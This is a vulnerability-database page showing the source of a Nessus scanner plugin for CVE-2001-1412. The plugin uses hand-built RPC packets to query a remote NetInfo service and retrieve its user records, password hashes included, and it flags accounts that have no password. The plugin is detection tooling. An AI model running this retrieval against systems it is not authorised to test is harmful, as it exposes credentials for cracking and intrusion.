Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2003-2018 and is owned by Tenable, Inc. or an Affiliate thereof.NETINFO_PASSWD.NASL
HistoryOct 19, 2003 - 12:00 a.m.

NetInfo Arbitrary Remote File Access

2003-10-1900:00:00
This script is Copyright (C) 2003-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
15

2.1 Low

CVSS2

Attack Vector

LOCAL

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:L/AC:L/Au:N/C:P/I:N/A:N

0.0004 Low

EPSS

Percentile

0.4%

JSON

Using NetInfo, it is possible to obtain the password file of the remote host by querying it directly.

An attacker may use it to set up a brute-force attack to crack the passwords contained in the file, and then use the gained passwords to login into the remote host, either remotely or locally.

#
# (C) Tenable Network Security, Inc.
#

include( 'compat.inc' );

if(description)
{
  script_id(11898);
  script_version("1.24");

  script_cve_id("CVE-2001-1412");
  script_bugtraq_id(2953);

  script_name(english:"NetInfo Arbitrary Remote File Access");
  script_summary(english:"Uses NetInfo to read /etc/passwd remotely");
  script_set_attribute(
    attribute:'synopsis',
    value:'The remote service is prone to an information disclosure flaw.'
  );

  script_set_attribute(
    attribute:'description',
    value:"
Using NetInfo, it is possible to obtain the password file of the remote host
by querying it directly.

An attacker may use it to set up a brute-force attack to crack the
passwords contained in the file, and then use the gained passwords to
login into the remote host, either remotely or locally.");

  script_set_attribute(
    attribute:'solution',
    value: "Restrict access to NetInfo."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(
    attribute:'see_also',
    value:'https://marc.info/?l=bugtraq&m=99953038722104&w=2'
  );

 script_set_attribute(attribute:"plugin_publication_date", value: "2003/10/19");
 script_set_attribute(attribute:"vuln_publication_date", value: "2001/06/26");
 script_cvs_date("Date: 2018/11/15 20:50:23");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2003-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"Misc.");
  script_dependencies("rpc_portmap.nasl", "netinfo_detect.nasl");
  script_require_keys("Services/netinfo");
  exit(0);
}

include("data_protection.inc");

RPC_PROG = 200100000;

function get_rpc_port(protocol, program)
{
 local_var	broken, req, soc, r, port;
 local_var	a, b, c, d, p_a, p_b, p_c, p_d, pt_a, pt_b, pt_c, pt_d;



 a = rand() % 255;
 b = rand() % 255;
 c = rand() % 255;
 d = rand() % 255;

 p_a = program / 16777216; 	p_a = p_a % 256;
 p_b = program / 65356; 	p_b = p_b % 256;
 p_c = program / 256;   	p_c = p_c % 256;
 p_d = program % 256;

 pt_a = protocol / 16777216; pt_a = pt_a % 256;
 pt_b = protocol / 65535   ; pt_b = pt_b % 256;
 pt_c = protocol / 256;    ; pt_c = pt_c % 256;
 pt_d = protocol % 256;


 req = raw_string(a, 	b, 	c, 	d, 	# XID
 		  0x00, 0x00, 0x00, 0x00,	# Msg type: call
		  0x00, 0x00, 0x00, 0x02,	# RPC Version
		  0x00, 0x01, 0x86, 0xA0,	# Program
		  0x00, 0x00, 0x00, 0x02,	# Program version
		  0x00, 0x00, 0x00, 0x03,	# Procedure
		  0x00, 0x00, 0x00, 0x00,	# Credentials - flavor
		  0x00, 0x00, 0x00, 0x00, 	# Credentials - length
		  0x00, 0x00, 0x00, 0x00,	# Verifier - Flavor
		  0x00, 0x00, 0x00, 0x00,	# Verifier - Length

		  0x0b, 0xed, 0x48, 0xa1,	# Program
		  0xFF, 0xFF, 0xFF, 0xFF,	# Version (any)
		  pt_a, pt_b, pt_c, pt_d,	# Proto (udp)
		  0x00, 0x00, 0x00, 0x00	# Port
 		  );


  port = int(get_kb_item("rpc/portmap"));
  if(port == 0)port = 111;


 broken = get_kb_item(string("/tmp/rpc/noportmap/", port));
 if(broken)return(0);

 if (! get_udp_port_state(port)) return 0;
 soc = open_sock_udp(port);
 send(socket:soc, data:req);
 r = recv(socket:soc, length:1024);

 close(soc);
 if(!r)
 {
  set_kb_item(name:string("/tmp/rpc/noportmap/", port), value:TRUE);
  return(0);
 }

 if(strlen(r) < 28)
  return(0);
 else
  {
   p_d = ord(r[27]);
   p_c = ord(r[26]);
   p_b = ord(r[25]);
   p_a = ord(r[24]);
   port = p_a;
   port = port * 256;
   port = port +p_b;
   port = port * 256;
   port = port + p_c;
   port = port * 256;
   port = port + p_d;
   return(port);
  }
}





function netinfo_recv(socket)
{
 local_var buf, len;

 buf = recv(socket:socket, length:4);
 if(strlen(buf) < 4)return NULL;

 len = ord(buf[3]) + ord(buf[2])*256;

 buf += recv(socket:socket, length:len);
 return buf;
}


function decode_strings(reply)
{
 local_var len, pad, start;
 local_var ret, str, value;

 ret = make_list();
 start = 46;

 while ( TRUE )
 {
 if(start > strlen(reply))break;
 len = ord(reply[start]) * 256 + ord(reply[start+1]);
 start += 2;
 str = substr(reply, start, start + len - 1);
 if( strlen(str) % 4 ) pad = 4 - strlen(str) % 4;
 else pad = 0;
 start += len + 6 + pad;
 len = ord(reply[start]) * 256 + ord(reply[start+1]);
 start += 2;
 value = substr(reply, start, start + len - 1);
 if( strlen(value) % 4 ) pad = 4 - strlen(value) % 4;
 else pad = 0;
 start += len + 2 + pad;
 ret[str] = value;
 }
 return ret;

}


report = "";
passwdless = "";


rpcport = get_rpc_port(protocol:IPPROTO_TCP, program:RPC_PROG);
if ( rpcport && get_port_state(rpcport))
{
 soc = open_sock_tcp(rpcport);
 if (  soc )
 {
  req = raw_string(0x80, 0x00, 0x00, 0x28, 0x11, 0xe0, 0x40, 0x95,
		 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02,
		 0x0b, 0xed, 0x48, 0xa1, 0x00, 0x00, 0x00, 0x01,
		 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00,
		 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		 0x00, 0x00, 0x00, 0x00);

 send(socket:soc, data:req);
 r = netinfo_recv(socket:soc);
 close(soc);
 if(strlen(r) > 35)
 {
  num_domains = ord(r[35]);
  start = 38;
  for ( i = 0 ; i < num_domains ; i ++ )
   {
   if(start > strlen(r))break;
   len = ord(r[start]) * 256 + ord(r[start+1]);
   start += 2;
   domain[i] = substr(r, start, start + len - 1);
   start += len + 10;
   if(len % 4)start += 4 - (len % 4);
   }
  }
 }
}

rpcport = get_rpc_port(protocol:IPPROTO_UDP, program:RPC_PROG);
flag = 0;
if ( rpcport )
{
 for ( n = 0 ; n < num_domains ; n ++ )
 {
 soc = open_sock_udp(rpcport);
 l_lo = strlen(domain[n]) % 256;
 l_hi = strlen(domain[n]) / 256;
 r = raw_string(0x68, 0xc1, 0x58, 0x98, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x02, 0x0b, 0xed, 0x48, 0xa1,
		0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x03,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, l_hi, l_lo) + domain[n];
 if(strlen(domain[n]) % 4)r += crap(data:raw_string(0), length:4-(strlen(domain[n]) % 4));
 send(socket:soc, data:r);
 r = recv(socket:soc, length:4096);
 close(soc);
 if ( !r ) break;
 else flag = 1;

 port = ord(r[strlen(r) - 2]) * 256 + ord(r[strlen(r) - 1]);
 domain_port[domain[n]] = port;
 }
}

#
# If we can not connect to nibindd, then we brute force
# our way by connecting to every port on which we KNOW that
# netinfo is listening.
#
if ( ! flag )
{
 ports = get_kb_list("Services/netinfo");
 if(isnull(ports))exit(0);
 else ports = make_list(ports);
 foreach p (ports)
 {
  domain_port["unknown_on_port_" + string(p)] = p;
 }
}

foreach dom (keys(domain_port))
{
 port = domain_port[dom];
 if ( get_port_state(port) )
 {
 soc = open_sock_tcp(port);
 if( soc )
 {
 req = raw_string(0x80, 0x00, 0x00, 0x28, 0x15, 0xeb, 0x49, 0x80,
		 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02,
		 0x0b, 0xed, 0x48, 0xa0, 0x00, 0x00, 0x00, 0x02,
		 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00,
		 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		 0x00, 0x00, 0x00, 0x00);

send(socket:soc, data:req);
r = netinfo_recv(socket:soc);



req = raw_string(0x80, 0x00, 0x00, 0x28, 0x15, 0xeb, 0x49, 0x7f,
		 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02,
		 0x0b, 0xed, 0x48, 0xa0, 0x00, 0x00, 0x00, 0x02,
		 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00,
		 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		 0x00, 0x00, 0x00, 0x00);

send(socket:soc, data:req);
r = netinfo_recv(socket:soc);



#
# Request the users map
#

req = raw_string(0x80, 0x00, 0x00, 0x44, 0x15, 0xeb, 0x49, 0x7e,
		 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02,
		 0x0b, 0xed, 0x48, 0xa0, 0x00, 0x00, 0x00, 0x02,
		 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x00, 0x00,
	 	 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		 0x00, 0x00, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x04,
	         0x6e, 0x61, 0x6d, 0x65, 0x00, 0x00, 0x00, 0x05,
		 0x75, 0x73, 0x65, 0x72, 0x73, 0x00, 0x00, 0x00);

send(socket:soc, data:req);
r = netinfo_recv(socket:soc);

if ( r )
{
req = raw_string(0x80, 0x00, 0x00, 0x30, 0x15, 0xeb, 0x49, 0x7d,
		 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02,
		 0x0b, 0xed, 0x48, 0xa0, 0x00, 0x00, 0x00, 0x02,
		 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00,
		 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
		 0x00, 0x00, 0x00, ord(r[strlen(r) - 1]));

send(socket:soc, data:req);
r = netinfo_recv(socket:soc);
}

if ( r )
{
req = raw_string(0x80, 0x00, 0x00, 0x30, 0x15, 0xeb, 0x49, 0x7c,
		 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02,
		 0x0b, 0xed, 0x48, 0xa0, 0x00, 0x00, 0x00, 0x02,
		 0x00, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0x00,
		 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
		 0x00, 0x00, 0x00, ord(r[strlen(r) - 1]));


send(socket:soc, data:req);
r = netinfo_recv(socket:soc);
}

if(strlen(r) > 35)
 {
num_users = ord(r[35]);


j = 0;
for(i=0;i<num_users*4;i+=4)
{
 if(40 + i > strlen(r))break;
 users[j] = substr(r, 36 + i, 39 + i);
 j++;
}

users[j] = NULL;

for ( i = 0 ; i < num_users ; i ++ )
{
 req = raw_string(0x80, 0x00, 0x00, 0x30, 0x15, 0xeb, 0x49, 0x7b,
		  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02,
		  0x0b, 0xed, 0x48, 0xa0, 0x00, 0x00, 0x00, 0x02,
		  0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00,
		  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		  0x00, 0x00, 0x00, 0x00) + users[i] + raw_string(
		  0x00, 0x00, 0x00, 0x0c);
 send(socket:soc, data:req);
 r = netinfo_recv(socket:soc);
 user = decode_strings(reply:r);
 if(user["name"] && user["uid"])
 {
 if ( flag == 0 )
 {
 report += ". In domain '" + dom + "' :

";
 flag = 1;
 }

 report += string(user["name"], ":", user["passwd"], ":", user["uid"], ":", user["gid"], ":", user["realname"], ":", user["home"], ":", user["shell"], "\n");
 if(strlen(user["passwd"]) == 0 )
  {
  passwdless += '  . ' + user["name"] + '\n';
  }
 if ( ! ereg(pattern:"^\**", string:user["passwd"]) )
	not_shadow ++;
 }
 }
 }
 }
}
 flag = 0;

}



if(strlen(report))
{
if(strlen(passwdless))
{
 passwdless = data_protection::sanitize_user_enum(users:passwdless);
 report += "
Note that the following accounts have NO PASSWORD set :
" + passwdless;
 }

 security_warning(port:port, extra:report);
}

Related

nvd 1
cvelist 1
cve 1
nvd
nvd
CVE-2001-1412
2003-11-17 05:00:00
cvelist
cvelist
CVE-2001-1412
2003-10-25 04:00:00
cve
cve
CVE-2001-1412
2003-11-17 05:00:00

2.1 Low

CVSS2

Attack Vector

LOCAL

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:L/AC:L/Au:N/C:P/I:N/A:N

0.0004 Low

EPSS

Percentile

0.4%

JSON
Related for NETINFO_PASSWD.NASL
nvd1cvelist1cve1